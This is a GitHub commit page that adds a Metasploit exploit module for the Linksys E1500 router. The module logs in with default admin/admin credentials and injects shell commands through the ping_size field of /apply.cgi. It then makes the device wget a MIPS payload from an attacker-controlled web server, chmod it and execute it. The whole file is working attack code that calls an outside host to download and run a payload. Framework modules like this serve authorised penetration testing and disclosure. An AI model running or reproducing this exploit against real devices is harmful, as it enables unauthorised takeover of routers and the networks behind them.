Skip to content

Commit e042fd3

Browse files
author
m-1-k-3
committed
first test of e1500 down and exec exploit
1 parent 6e1182b commit e042fd3

File tree

1 file changed

+196
-0
lines changed

1 file changed

+196
-0
lines changed

modules/exploits/multi/http/linksys_e1500_up_exec.rb

Lines changed: 196 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,196 @@
1+
##
2+
# This file is part of the Metasploit Framework and may be subject to
3+
# redistribution and commercial restrictions. Please see the Metasploit
4+
# web site for more information on licensing and terms of use.
5+
# http://metasploit.com/
6+
##
7+
8+
require 'msf/core'
9+
10+
class Metasploit3 < Msf::Exploit::Remote
11+
Rank = ExcellentRanking
12+
13+
include Msf::Exploit::Remote::HttpClient
14+
include Msf::Exploit::Remote::HttpServer
15+
16+
def initialize(info = {})
17+
super(update_info(info,
18+
'Name' => 'Linksys E1500 Command Execution - Upload and Execute',
19+
'Description' => %q{
20+
This module can be used to execute a payload on Linksys Routers
21+
},
22+
'Author' => [ 'Michael Messner <[email protected]>'],
23+
'License' => MSF_LICENSE,
24+
'References' =>
25+
[
26+
[ 'BID', '57760' ],
27+
[ 'EDB', '24475' ],
28+
[ 'OSVDB', '89912' ],
29+
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
30+
],
31+
'DisclosureDate' => 'Feb 05 2013',
32+
'Privileged' => true,
33+
'Platform' => [ 'linux' ],
34+
'Arch' => ARCH_MIPSLE,
35+
'Targets' => [[ 'Automatic', { }]],
36+
'Payload' =>
37+
{
38+
'Space' => 1024,
39+
'DisableNops' => true,
40+
},
41+
'DefaultTarget' => 0
42+
))
43+
44+
register_options(
45+
[
46+
Opt::RPORT(80),
47+
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
48+
OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]),
49+
OptString.new('DOWNHOST', [ false, 'The host to request the MIPS payload from' ]),
50+
OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)', nil ]),
51+
OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),
52+
], self.class)
53+
end
54+
55+
56+
57+
def request(cmd,user,pass,uri)
58+
59+
begin
60+
res = send_request_cgi({
61+
'uri' => uri,
62+
'method' => 'POST',
63+
'authorization' => basic_auth(user,pass),
64+
'encode_params' => true,
65+
'vars_post' => {
66+
"submit_button" => "Diagnostics",
67+
"change_action" => "gozila_cgi",
68+
"submit_type" => "start_ping",
69+
"action" => "",
70+
"commit" => "0",
71+
"ping_ip" => "1.1.1.1",
72+
"ping_size" => "&#{cmd}&",
73+
"ping_times" => "5",
74+
"traceroute_ip" => ""
75+
}
76+
})
77+
78+
if (! res)
79+
fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload [No Response]")
80+
end
81+
82+
rescue ::Rex::ConnectionError
83+
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
84+
return
85+
end
86+
87+
88+
end
89+
90+
def exploit
91+
downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
92+
uri = '/apply.cgi'
93+
user = datastore['USERNAME']
94+
pass = datastore['PASSWORD']
95+
rhost = datastore['RHOST']
96+
rport = datastore['RPORT']
97+
98+
# We must regenerate the payload-> not sure if this is the right way
99+
arch = "ARCH_MIPSLE"
100+
plat = "linux"
101+
p = exploit_regenerate_payload(plat, arch)
102+
@pl = p.encoded_exe
103+
104+
#
105+
# start our server
106+
#
107+
resource_uri = '/' + downfile
108+
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
109+
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
110+
start_service({'Uri' => {
111+
'Proc' => Proc.new { |cli, req|
112+
on_request_uri(cli, req)
113+
},
114+
'Path' => resource_uri
115+
}})
116+
117+
if (datastore['DOWNHOST'])
118+
service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
119+
end
120+
121+
122+
#
123+
# testing Login
124+
#
125+
126+
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
127+
128+
begin
129+
res = send_request_cgi({
130+
'uri' => uri,
131+
'method' => 'GET',
132+
'authorization' => basic_auth(user,pass)
133+
})
134+
135+
return if res.nil?
136+
return if (res.code == 404)
137+
138+
if [200, 301, 302].include?(res.code)
139+
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
140+
else
141+
print_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
142+
return
143+
end
144+
145+
rescue ::Rex::ConnectionError
146+
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
147+
return
148+
end
149+
150+
print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{service_url}")
151+
152+
#this filename is used to store the payload on the device
153+
filename = rand_text_alpha_lower(8)
154+
155+
cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
156+
157+
request(cmd,user,pass,uri)
158+
159+
#
160+
# chmod
161+
#
162+
163+
cmd = "chmod 777 /tmp/#{filename}"
164+
165+
print_status("#{rhost}:#{rport} - Asking the Linksys device to prepare #{downfile}")
166+
167+
request(cmd,user,pass,uri)
168+
169+
#
170+
# execute
171+
#
172+
173+
cmd = "/tmp/#{filename}"
174+
175+
print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}")
176+
177+
request(cmd,user,pass,uri)
178+
179+
handler
180+
end
181+
182+
183+
# # Handle incoming requests from the server
184+
def on_request_uri(cli, request)
185+
186+
#print_status("on_request_uri called: #{request.inspect}")
187+
if (not @pl)
188+
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
189+
return
190+
end
191+
192+
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
193+
send_response(cli, @pl)
194+
end
195+
196+
end

0 commit comments

Comments
 (0)